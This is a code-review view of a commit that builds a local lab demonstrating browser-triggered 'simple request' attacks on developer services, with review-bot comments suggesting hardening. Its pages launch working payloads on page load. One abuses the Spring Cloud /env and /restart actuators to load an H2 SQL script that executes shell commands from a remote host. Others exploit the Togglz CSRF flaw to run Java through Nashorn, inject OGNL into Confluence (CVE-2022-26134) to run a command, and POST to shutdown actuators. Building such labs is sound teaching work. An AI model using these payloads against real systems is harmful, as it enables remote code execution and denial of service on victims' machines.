  • ■ ■ ■ ■ ■ ■
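--- a/README.md
+++ b/README.md
@@ -0,0 +1,24 @@
+To run
+
+edit /etc/hosts and add
+127.0.0.1 somerandomsite.bla
+
+To run the webserver
+cd webserver/
+./rebuild.sh
+
+This starts the webserver on port 8081.
+
+To start up on of the vulnerable services.
+cd into spring-cloud-v1-vuln or spring-boot-hello-world-feature-enum
+and run
+mvn clean spring-boot:run
+which will build and run the vulnerable service
+This requires Java 8. It may work with newer Java versions, but not tested.
+
+
+
+Then open a web browser at http://somerandomsite.bla:8081
+Then select the link which matches the vulnerable service currently running.
+The shutdown payload works with both services.
+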
  • ■ ■ ■ ■ ■ ■
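--- a/spring-boot-hello-world-feature-enum/.gitignore
+++ b/spring-boot-hello-world-feature-enum/.gitignore
@@ -0,0 +1,3 @@
+.idea/
+target/
+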
  • ■ ■ ■ ■ ■
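--- a/spring-boot-hello-world-feature-enum/README.md
+++ b/spring-boot-hello-world-feature-enum/README.md
@@ -0,0 +1,5 @@
+
+Run `mvn clean spring-boot:run`
+Requires Java <15 . Preferably Java 8. As Togglz Java Scripting API relies on Nashorn which was removed from Java in 15.
+
+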
  • ■ ■ ■ ■ ■ ■
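--- a/spring-boot-hello-world-feature-enum/pom.xml
+++ b/spring-boot-hello-world-feature-enum/pom.xml
@@ -0,0 +1,129 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
+ <modelVersion>4.0.0</modelVersion>
+
+ <properties>
+ <java.version>1.8</java.version>
+ <togglz.version>2.7.2</togglz.version>
+ <spring-boot.version>2.3.1.RELEASE</spring-boot.version>
+ </properties>
+
+ <groupId>org.togglz.samples</groupId>
+ <artifactId>togglz-sample-spring-boot-hello-world-feature-enum</artifactId>
+ <version>1.0.0-SNAPSHOT</version>
+
+
+ <name>Togglz Sample Spring Boot Hello World Feature Enum</name>
+ <description>Togglz Sample Spring Boot Hello World Feature Enum</description>
+
+
+ <dependencies>
+ <dependency>
+ <groupId>org.togglz</groupId>
+ <artifactId>togglz-core</artifactId>
+ <version>${togglz.version}</version>
+ </dependency>
+
+ <dependency>
+ <groupId>org.togglz</groupId>
+ <artifactId>togglz-console</artifactId>
+ <version>${togglz.version}</version>
+ </dependency>
+
+ <dependency>
+ <groupId>org.togglz</groupId>
+ <artifactId>togglz-junit</artifactId>
+ <version>${togglz.version}</version>
+ <scope>test</scope>
+ </dependency>
+
+ <dependency>
+ <groupId>org.togglz</groupId>
+ <artifactId>togglz-servlet</artifactId>
+ <version>${togglz.version}</version>
+ </dependency>
+
+ <dependency>
+ <groupId>org.togglz</groupId>
+ <artifactId>togglz-spring-core</artifactId>
+ <version>${togglz.version}</version>
+ </dependency>
+
+ <dependency>
+ <groupId>org.togglz</groupId>
+ <artifactId>togglz-spring-security</artifactId>
+ <version>${togglz.version}</version>
+ </dependency>
+
+ <dependency>
+ <groupId>org.togglz</groupId>
+ <artifactId>togglz-spring-boot-starter</artifactId>
+ <version>${togglz.version}</version>
+ </dependency>
+
+ <dependency>
+ <!-- Import dependency management from Spring Boot -->
+ <groupId>org.springframework.boot</groupId>
+ <artifactId>spring-boot-dependencies</artifactId>
+ <version>${spring-boot.version}</version>
+ <type>pom</type>
+ <scope>import</scope>
+ </dependency>
+ <dependency>
+ <groupId>org.springframework.boot</groupId>
+ <artifactId>spring-boot-starter-actuator</artifactId>
+ <version>${spring-boot.version}</version>
+ </dependency>
+
+ <dependency>
+ <groupId>org.springframework.boot</groupId>
+ <artifactId>spring-boot-starter-web</artifactId>
+ <version>${spring-boot.version}</version>
+ </dependency>
+
+ <dependency>
+ <groupId>org.springframework.boot</groupId>
+ <artifactId>spring-boot-starter-test</artifactId>
+ <version>${spring-boot.version}</version>
+ <scope>test</scope>
+ </dependency>
+
+
+
+
+ </dependencies>
+
+ <build>
+ <plugins>
+ <plugin>
+ <groupId>org.springframework.boot</groupId>
+ <artifactId>spring-boot-maven-plugin</artifactId>
+ <version>${spring-boot.version}</version>
+ </plugin>
+ <plugin>
+ <groupId>org.apache.maven.plugins</groupId>
+ <artifactId>maven-compiler-plugin</artifactId>
+ <configuration>
+ <source>${java.version}</source>
+ <target>${java.version}</target>
+ </configuration>
+ </plugin>
+ <plugin>
+ <groupId>org.springframework.boot</groupId>
+ <artifactId>spring-boot-maven-plugin</artifactId>
+ </plugin>
+
+ <plugin>
+ <groupId>org.apache.maven.plugins</groupId>
+ <artifactId>maven-war-plugin</artifactId>
+ <version>2.6</version>
+ <configuration>
+ <failOnMissingWebXml>false</failOnMissingWebXml>
+ </configuration>
+ </plugin>
+ </plugins>
+ </build>
+
+</project>
+
+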
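Review bot: The `spring-boot-dependencies` entry with `<scope>import</scope>` (file lines 64-71) sits directly under `<dependencies>`, but Maven only honours the import scope inside `<dependencyManagement>`, so the BOM is not actually imported and Maven is expected to report a model warning for it. Moving that entry into a `<dependencyManagement><dependencies>` wrapper would fix this. `spring-boot-maven-plugin` is also declared twice (file lines 98-102 and 111-114), and `maven-war-plugin` is configured although the project declares no `<packaging>war</packaging>`. Because `togglz.version` 2.7.2 appears to be pinned on purpose for the demo, a comment next to the property such as `<!-- intentionally vulnerable version for this lab: do not upgrade here, do not reuse elsewhere -->` would stop dependency bots and copy-paste reuse from tripping over it.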
  • ■ ■ ■ ■ ■ ■
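--- a/spring-boot-hello-world-feature-enum/src/main/java/sample/Application.java
+++ b/spring-boot-hello-world-feature-enum/src/main/java/sample/Application.java
@@ -0,0 +1,13 @@
+package sample;
+
+import org.springframework.boot.SpringApplication;
+import org.springframework.boot.autoconfigure.SpringBootApplication;
+
+@SpringBootApplication
+public class Application {
+
+ public static void main(String[] args) {
+ SpringApplication.run(Application.class, args);
+ }
+}
+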
  • ■ ■ ■ ■ ■ ■
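--- a/spring-boot-hello-world-feature-enum/src/main/java/sample/Features.java
+++ b/spring-boot-hello-world-feature-enum/src/main/java/sample/Features.java
@@ -0,0 +1,22 @@
+package sample;
+
+import org.togglz.core.Feature;
+import org.togglz.core.annotation.EnabledByDefault;
+import org.togglz.core.annotation.Label;
+import org.togglz.core.context.FeatureContext;
+
+public enum Features implements Feature {
+
+ @Label("just a description")
+ @EnabledByDefault
+ HELLO_WORLD,
+
+ @Label("another description")
+ REVERSE_GREETING;
+
+ public boolean isActive() {
+ return FeatureContext.getFeatureManager().isActive(this);
+ }
+}
+
+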
  • ■ ■ ■ ■ ■ ■
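--- a/spring-boot-hello-world-feature-enum/src/main/java/sample/HelloWorldController.java
+++ b/spring-boot-hello-world-feature-enum/src/main/java/sample/HelloWorldController.java
@@ -0,0 +1,22 @@
+package sample;
+
+import org.springframework.http.ResponseEntity;
+import org.springframework.web.bind.annotation.RequestMapping;
+import org.springframework.web.bind.annotation.RestController;
+
+@RestController
+public class HelloWorldController {
+
+ @RequestMapping("/")
+ public ResponseEntity<?> index() {
+ if (Features.HELLO_WORLD.isActive()) {
+ StringBuilder sb = new StringBuilder("Greetings from Spring Boot!");
+ if (Features.REVERSE_GREETING.isActive()) {
+ sb.reverse();
+ }
+ return ResponseEntity.ok().body(sb.toString());
+ }
+ return ResponseEntity.notFound().build();
+ }
+}
+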
  • ■ ■ ■ ■ ■ ■
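--- a/spring-boot-hello-world-feature-enum/src/main/java/sample/TogglzConfiguration.java
+++ b/spring-boot-hello-world-feature-enum/src/main/java/sample/TogglzConfiguration.java
@@ -0,0 +1,16 @@
+package sample;
+
+import org.springframework.context.annotation.Bean;
+import org.springframework.context.annotation.Configuration;
+import org.togglz.core.manager.EnumBasedFeatureProvider;
+import org.togglz.core.spi.FeatureProvider;
+
+@Configuration
+public class TogglzConfiguration {
+
+ @Bean
+ public FeatureProvider featureProvider() {
+ return new EnumBasedFeatureProvider(Features.class);
+ }
+}
+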
  • ■ ■ ■ ■ ■ ■
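--- a/spring-boot-hello-world-feature-enum/src/main/resources/application.yml
+++ b/spring-boot-hello-world-feature-enum/src/main/resources/application.yml
@@ -0,0 +1,15 @@
+logging:
+ level:
+ org.togglz: DEBUG
+togglz:
+ console:
+ secured: false
+ use-management-port: false
+management:
+ endpoints:
+ web:
+ exposure:
+ include: '*'
+ endpoint:
+ shutdown:
+ enabled: true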
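Review bot: Nothing in this file restricts the listener to loopback, so with `togglz.console.secured: false` and `management.endpoints.web.exposure.include: '*'` the unauthenticated Togglz console and every actuator, including shutdown, are reachable from any host that can route to the machine, because Spring Boot binds to all interfaces by default. Adding `server.address: 127.0.0.1` keeps the deliberately weak settings confined to the developer's own machine. The same applies to `spring-cloud-v1-vuln/src/main/resources/application.properties`, where the line would be `server.address=127.0.0.1`. A header comment such as `# Deliberately insecure lab configuration: never reuse outside this demo` would also make the intent explicit to anyone who finds the file out of context.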
  • ■ ■ ■ ■ ■ ■
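--- a/spring-cloud-v1-vuln/.gitignore
+++ b/spring-cloud-v1-vuln/.gitignore
@@ -0,0 +1,3 @@
+.idea/
+target/
+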
  • ■ ■ ■ ■ ■ ■
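--- a/spring-cloud-v1-vuln/pom.xml
+++ b/spring-cloud-v1-vuln/pom.xml
@@ -0,0 +1,119 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+ xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
+ <modelVersion>4.0.0</modelVersion>
+
+ <groupId>com.contrast</groupId>
+ <artifactId>spring-cloud-1-vuln</artifactId>
+ <version>0.0.1-SNAPSHOT</version>
+ <packaging>jar</packaging>
+
+ <name>Spring boot application example</name>
+ <description>Test project</description>
+
+ <parent>
+ <groupId>org.springframework.boot</groupId>
+ <artifactId>spring-boot-starter-parent</artifactId>
+ <version>1.5.11.RELEASE</version>
+ <relativePath/> <!-- lookup parent from repository -->
+ </parent>
+
+ <properties>
+ <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
+ <java.version>1.8</java.version>
+ <!-- dependency versions -->
+ <com.google.guava.guava.version>21.0</com.google.guava.guava.version>
+ <io.springfox.springfox-swagger2>2.3.1</io.springfox.springfox-swagger2>
+ <io.springfox.springfox-swagger-ui>2.3.1</io.springfox.springfox-swagger-ui>
+ </properties>
+ <dependencyManagement>
+ <dependencies>
+ <dependency>
+ <groupId>org.springframework.cloud</groupId>
+ <artifactId>spring-cloud-dependencies</artifactId>
+ <version>Edgware.SR6</version>
+ <type>pom</type>
+ <scope>import</scope>
+ </dependency>
+ </dependencies>
+ </dependencyManagement>
+
+ <dependencies>
+ <!-- For default Spring Boot utilities -->
+ <dependency>
+ <groupId>org.springframework.boot</groupId>
+ <artifactId>spring-boot-starter</artifactId>
+ </dependency>
+
+ <!-- For testing possibility -->
+ <dependency>
+ <groupId>org.springframework.boot</groupId>
+ <artifactId>spring-boot-starter-test</artifactId>
+ <scope>test</scope>
+ </dependency>
+
+ <!-- For all mvc and web functions -->
+ <dependency>
+ <groupId>org.springframework.boot</groupId>
+ <artifactId>spring-boot-starter-web</artifactId>
+ </dependency>
+
+ <!-- Default persistence functions -->
+ <dependency>
+ <groupId>org.springframework.boot</groupId>
+ <artifactId>spring-boot-starter-data-jpa</artifactId>
+ </dependency>
+
+ <dependency>
+ <groupId>org.springframework.boot</groupId>
+ <artifactId>spring-boot-starter-actuator</artifactId>
+ </dependency>
+
+
+ <!-- In-Memory DB -->
+ <dependency>
+ <groupId>com.h2database</groupId>
+ <artifactId>h2</artifactId>
+ <scope>runtime</scope>
+ </dependency>
+
+ <!-- Java Utilities from google -->
+ <dependency>
+ <groupId>com.google.guava</groupId>
+ <artifactId>guava</artifactId>
+ <version>${com.google.guava.guava.version}</version>
+ </dependency>
+
+ <!-- Include swagger for API description -->
+ <dependency>
+ <groupId>io.springfox</groupId>
+ <artifactId>springfox-swagger2</artifactId>
+ <version>${io.springfox.springfox-swagger2}</version>
+ </dependency>
+
+ <!-- Include swagger for API description UI -->
+ <dependency>
+ <groupId>io.springfox</groupId>
+ <artifactId>springfox-swagger-ui</artifactId>
+ <version>${io.springfox.springfox-swagger-ui}</version>
+ </dependency>
+
+ <!-- https://mvnrepository.com/artifact/org.springframework.cloud/spring-cloud-starter-config -->
+ <dependency>
+ <groupId>org.springframework.cloud</groupId>
+ <artifactId>spring-cloud-starter-config</artifactId>
+ <version>1.4.4.RELEASE</version>
+ </dependency>
+
+ </dependencies>
+
+ <build>
+ <plugins>
+ <plugin>
+ <groupId>org.springframework.boot</groupId>
+ <artifactId>spring-boot-maven-plugin</artifactId>
+ </plugin>
+ </plugins>
+ </build>
+
+</project>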
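Review bot: `spring-cloud-starter-config` carries an explicit `<version>1.4.4.RELEASE</version>` (file lines 102-106) even though the `spring-cloud-dependencies` BOM `Edgware.SR6` is imported above, so the BOM's managed version is overridden for this one artifact. If the demo depends on that pin, say so in a comment (for example `<!-- pinned for the lab: intentionally outdated -->`); otherwise drop the version and let the BOM manage it. `guava`, `springfox-swagger2` and `springfox-swagger-ui` are declared, but nothing in the Java sources shown in this commit appears to use them, so they look like template leftovers that only add old third-party code to the classpath beyond what the lab demonstrates.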
  • ■ ■ ■ ■ ■ ■
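--- a/spring-cloud-v1-vuln/src/main/java/com/contrast/app/Application.java
+++ b/spring-cloud-v1-vuln/src/main/java/com/contrast/app/Application.java
@@ -0,0 +1,15 @@
+package com.contrast.app;
+
+import org.springframework.boot.SpringApplication;
+import org.springframework.boot.autoconfigure.SpringBootApplication;
+
+@SpringBootApplication
+public class Application {
+
+ public static void main(String[] args) {
+ SpringApplication.run(Application.class, args);
+ }
+
+
+}
+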
  • ■ ■ ■ ■ ■ ■
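--- a/spring-cloud-v1-vuln/src/main/java/com/contrast/app/Controller.java
+++ b/spring-cloud-v1-vuln/src/main/java/com/contrast/app/Controller.java
@@ -0,0 +1,14 @@
+package com.contrast.app;
+
+
+import org.springframework.web.bind.annotation.GetMapping;
+
+@org.springframework.stereotype.Controller
+public class Controller {
+
+ @GetMapping("/test")
+ public String getRequest() {
+ return "hello";
+ }
+}
+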
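Review bot: `getRequest()` returns `"hello"` from a class annotated with `@org.springframework.stereotype.Controller`, so Spring MVC treats the string as a view name rather than a response body. No template engine is declared in this module's pom.xml, so `GET /test` will most likely fail to resolve a view instead of answering with text. If a plain-text reply is intended, annotate the class with `@RestController` or the method with `@ResponseBody`. Renaming the class, for example to `TestController`, would also remove the name clash that forces the fully qualified annotation.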
  • ■ ■ ■ ■ ■ ■
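--- a/spring-cloud-v1-vuln/src/main/resources/application.properties
+++ b/spring-cloud-v1-vuln/src/main/resources/application.properties
@@ -0,0 +1,11 @@
+management.security.enabled=false
+endpoints.restart.enabled=true
+endpoints.shutdown.enabled=true
+spring.datasource.username=sa
+spring.datasource.password=
+spring.datasource.driverClassName=org.h2.Driver
+spring.datasource.url = jdbc:h2:mem:testdb
+spring.h2.console.enabled = true
+spring.h2.console.path=/h2-console
+spring.jpa.database-platform=org.hibernate.dialect.H2Dialect
+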
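Review bot: `spring.h2.console.enabled = true` together with `spring.h2.console.path=/h2-console` (file lines 8-9) exposes an extra database administration endpoint that the walkthrough in index.html does not appear to use, since it only describes `/env` and `/restart`. Dropping those two lines would keep the lab's exposed surface limited to what it sets out to demonstrate. The empty `spring.datasource.password=` for user `sa` and `management.security.enabled=false` deserve a leading comment such as `# Deliberately insecure lab defaults: do not copy into a real service`.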
  • ■ ■ ■ ■ ■ ■
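--- a/webserver/Dockerfile
+++ b/webserver/Dockerfile
@@ -0,0 +1,3 @@
+FROM httpd:2.4
+COPY ./public-html/ /usr/local/apache2/htdocs/
+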
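Review bot: `FROM httpd:2.4` is a floating tag, so every rebuild can pull a different image and the lab is not reproducible. Pinning a digest, e.g. `FROM httpd:2.4@sha256:<digest>` (placeholder, to be filled with the digest you verified), keeps an upstream tag change from silently altering what runs on the developer's machine.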
  • ■ ■ ■ ■ ■ ■
    webserver/public-html/confluence-cve-2022-26134.html
     1 +<html>
     2 +<head>
     3 + </head>
     4 + <body onload="execConfRCE()">
     5 + This contains the payload for the Confluence RCE. If all goes well you find a file named r7 in /tmp
     6 + 
     7 + </body>
     8 + <script>
     9 + function execConfRCE() {
     10 + 
     11 + 
     12 + var xhr = new XMLHttpRequest();
     13 + 
     14 + xhr.open("GET", "http://localhost:8090/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22touch%20/tmp/r7%22%29%7D/");
     15 + xhr.send(null);
     16 + }
     17 + </script>
     18 + </html>
     19 + 
  • ■ ■ ■ ■ ■ ■
    webserver/public-html/exec.sql
     1 +CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {
     2 + java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A");
     3 +return s.hasNext() ? s.next() : ""; }
     4 +$$;
     5 +CALL SHELLEXEC('open /System/Applications/Calculator.app/')
     6 + 
  • ■ ■ ■ ■ ■ ■
    webserver/public-html/index.html
     1 +<html>
     2 +<head>
     3 + </head>
     4 + <body>
     5 + <center><h1>Simple Request Vulnerabilities in the Developer Environment</h1></center>
     6 + Following the below guide and clicking on the payload link will trigger a RCE on your local machine. In all but one instance this will open the Calculator app. ( assuming you are using a Mac. ) Or for Confluence create a file in /tmp.</br></br>
     7 + <h3> Spring Cloud </h3>
     8 + This works because Spring Cloud V1 allowed the /env actuator to modify properties with a POST request with content type application/x-www-form-urlencoded. Allowing for a Simple Request attack.</br>
     9 + This is done by first setting the spring app's jdbc url to : </br>
     10 + <i>
     11 + spring.datasource.url=jdbc:h2:mem:testdb;INIT=runscript from 'http://somerandomsite.bla:8081/exec.sql'</i></br>
     12 + Then restarting the application so the change takes effect via the /restart actuator. </br>
     13 + On startup, the Spring App will create a in memory H2 database and call out to http://somerandomsite.bla:8081/exec.sql to download the sql and execute it. This leverages a feature of the in memory H2 database to compile and execute a Java method which in turn opens the Calculator app.
     14 + <p><b>To Run : </b></br><i>
     15 + git clone xxx</br>
     16 + cd Simple-Requests/spring-cloud-v1-vuln</br>
     17 + mvn spring-boot:run</br>
     18 + </i>
     19 + <a href="springcloud.html">Payload Link</a></p>
     20 +</br>
     21 + <h3>Togglz</h3>
     22 + This relies on the Togglz CSRF Vulnerability <a href="https://github.com/advisories/GHSA-697v-pxg3-j262">CVE-2020-28191</a>.</br> A Simple Post Request can be made to hit localhost which modifies the feature toggle to execute arbitrary Java code via the Nashorn engine during toggle evaluation.
     23 + <p><b>To Run : </b></br><i>
     24 + cd Simple-Requests/spring-boot-hello-world-feature-enum</br>
     25 + mvn spring-boot:run</br>
     26 + </i>
     27 + <a href="togglz.html">Payload Link</a></p>
     28 + 
     29 +</br>
     30 +<h3>Spring Actuator Shutdown</h3>
     31 + In Spring V2 actuators require a content-type of application/json. But when a post request does not have a message body, like with the /shutdown actuator, if no content-type is specified the actuator can still be triggered. So a Simple Post Request can be use to shutdown a Spring Boot app bound to localhost.
     32 + <p><b>To Run : </b></br><i>
     33 + cd Simple-Requests/spring-boot-hello-world-feature-enum</br>
     34 + mvn spring-boot:run</br>
     35 + </i>
     36 + 
     37 + <a href="shutdown.html">Payload Link</a></p>
     38 + 
     39 +</br>
     40 + <h3>Confluence CVE-2022-26134</h3>
     41 + This Confluence RCE relies on OGNL injection. As it is done via a Simple Get Request, it can be run via a Simple Request accessing localhost or an internal network that the victim has access to.
     42 + <p><b>To Run : </b></br><i>
     43 + git clone https://github.com/vulhub/vulhub.git </br>
     44 + cd vulhub/confluence/CVE-2022-26134 </br>
     45 + docker-compose up
     46 + <i></br>
     47 + 
     48 + <a href="confluence-cve-2022-26134.html"> Payload Link </a></p>
     49 + </body>
     50 + 
     51 + 
     52 +</html>
     53 + 
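Review bot: The page explains how each request works but never tells the reader how to protect a real development environment, which is the part practitioners need. Each section would benefit from a short "Mitigation" line. From what this commit itself shows, that would be: keep actuator security enabled and do not expose `/env`, `/restart` or `/shutdown`; upgrade Togglz as the linked advisory describes and leave the console secured; apply the vendor fix for CVE-2022-26134. Separately, `</br>` is not a valid tag (`<br>` is), the `<i>` on file line 46 should be the closing `</i>`, and `git clone xxx` on file line 15 is a placeholder left in.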
  • ■ ■ ■ ■ ■ ■
    webserver/public-html/shutdown.html
     1 +<html>
     2 +<head>
     3 + </head>
     4 + <body onload="shutdownActuator()">
     5 + This contains the payload to shutdown Spring applications containing the /shutdown Actuator
     6 + </body>
     7 + 
     8 + <script>
     9 + function shutdownActuator() {
     10 + var shutdownOld = new XMLHttpRequest();
     11 + shutdownOld.open("POST", "http://localhost:8080/shutdown");
     12 + shutdownOld.send(null);
     13 + var shutdownNew = new XMLHttpRequest();
     14 + shutdownNew.open("POST", "http://localhost:8080/actuator/shutdown");
     15 + shutdownNew.send(null);
     16 + }
     17 + </script>
     18 + 
     19 + </html>
     20 + 
     21 + 
  • ■ ■ ■ ■ ■ ■
    webserver/public-html/springcloud.html
     1 +<html>
     2 +<head>
     3 + </head>
     4 + <body onload="execActuator()">
     5 + This contains the payload for the Spring Cloud V1 RCE. If all goes well you should see the calculator app open.
     6 + </body>
     7 + 
     8 + <script>
     9 + function execActuator() {
     10 + 
     11 + var xhr = new XMLHttpRequest();
     12 + xhr.addEventListener("readystatechange", function() {
     13 + if(this.readyState === 4) {
     14 + console.log(this.responseText);
     15 + 
     16 + }
     17 + });
     18 + 
     19 + xhr.open("POST", "http://localhost:8080/env?spring.datasource.url=jdbc:h2:mem:testdb;INIT=runscript%20from%20'http://somerandomsite.bla:8081/exec.sql'");
     20 + xhr.onprogress = function () {
     21 + console.log('LOADING: ', xhr.status);
     22 + };
     23 + 
     24 + xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
     25 + xhr.send(null);
     26 + 
     27 + var res = new XMLHttpRequest();
     28 + 
     29 + res.addEventListener("readystatechange", function() {
     30 + if(this.readyState === 4) {
     31 + console.log(this.responseText);
     32 + 
     33 + }
     34 + });
     35 + 
     36 + res.open("POST", "http://localhost:8080/restart");
     37 + res.onreadystatechange = function () {
     38 + console.log('LOADINGXXX: ', res.status);
     39 + };
     40 + 
     41 + res.onload = function () {
     42 + console.log('DONEX: ', res.status);
     43 + };
     44 + res.send(null);
     45 + 
     46 + }
     47 + </script>
     48 + 
     49 + </html>
     50 + 
  • ■ ■ ■ ■ ■ ■
    webserver/public-html/togglz.html
     1 +<html>
     2 +<head>
     3 + </head>
     4 + <body onload="execTogglz()">
     5 + This contains the payload for the Togglz RCE. If all goes well you should see the calculator app open.
     6 + 
     7 + </body>
     8 + <script>
     9 + function execTogglz() {
     10 + 
     11 + var data = "f=HELLO_WORLD&enabled=enabled&strategy=script&p1=&p2=&p3=&p4=ECMAScript&p5=java.lang.Runtime.getRuntime%28%29.exec%28%27open+%2FSystem%2FApplications%2FCalculator.app%2F%27%29%3B%0D%0A0+%3D%3D+0%3B&p6=&p7=&p8=&p9=&p10=&p11=&p12=&p13=&p14=&p15=&p16=";
     12 + 
     13 + var xhr = new XMLHttpRequest();
     14 + 
     15 + xhr.open("POST", "http://localhost:8080/togglz-console/edit");
     16 + xhr.setRequestHeader("content-type", "application/x-www-form-urlencoded");
     17 + xhr.send(data);
     18 + sleep(1000);
     19 + var triggerFeatureToggle = new XMLHttpRequest();
     20 + triggerFeatureToggle.open("GET", "http://localhost:8080/");
     21 + triggerFeatureToggle.send(null);
     22 + }
     23 + function sleep(ms) {
     24 + return new Promise(resolve => setTimeout(resolve, ms));
     25 + }
     26 + </script>
     27 + </html>
     28 + 
  • ■ ■ ■ ■ ■
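--- a/webserver/rebuild.sh
+++ b/webserver/rebuild.sh
@@ -0,0 +1,5 @@
+docker stop `docker ps|grep -v CONT |awk '{print $1}'`
+docker rmi apache2
+docker build -t apache2 .
+docker run --rm -dit -p 8081:80 apache2
+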
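Review bot: Line 1 stops every running container on the host, not just this lab's web server, because it feeds the whole `docker ps` listing to `docker stop`. Giving the container a name and stopping only that one avoids the collateral damage: `docker stop simple-requests-web 2>/dev/null || true`. Line 4 publishes the port on all interfaces, so the pages are served to the whole network; `docker run --rm -dit --name simple-requests-web -p 127.0.0.1:8081:80 apache2` keeps it on loopback, which is all the README's `/etc/hosts` entry needs. The script also has no shebang, and `docker rmi apache2` prints an error on a first run when the image does not yet exist.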